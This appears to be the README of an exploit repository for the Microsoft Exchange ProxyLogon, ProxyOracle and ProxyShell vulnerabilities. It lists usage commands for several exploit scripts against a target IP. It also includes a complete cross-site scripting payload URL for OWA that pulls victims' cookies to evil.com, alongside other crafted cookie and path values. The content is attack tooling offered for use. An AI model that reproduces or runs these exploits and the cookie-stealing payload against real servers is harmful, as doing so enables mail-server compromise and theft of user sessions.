ProxyVulns
ProxyLogon
Usage: python3 26855.py 1.1.1.1
ProxyOracle
Once a victim clicks this link, evil.com will receive the cookies.
https://ews.lab/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.cookie=`[email protected]:443/path/any.php%23~1941962753`;document.cookie=`X-AnonResource=true`;fetch(`/owa/auth/any.skin`,{credentials:`include`});//
pip3 install pycryptodome
Usage: python3 31196.py 1.1.1.1 'cadata=xxx; cadataTTL=yyy; ...'
ProxyShell
pip3 install pypsrp
Usage: python3 34473.py 1.1.1.1
Usage: python3 31207.py 1.1.1.1 [Local File Path] [UNC Absolute Path]
Not working in some versions target(due to
/@gmail.com
path), maybe fix it later
Others
-
Cookie: securitytoken=foobar
-
/owa/calendar/[email protected]/foobar/owa14.aspx/.js
Reference
ProxyLogon Vulnerability Analysis(Chinese)
ProxyOracle Vulnerability Analysis(Chinese)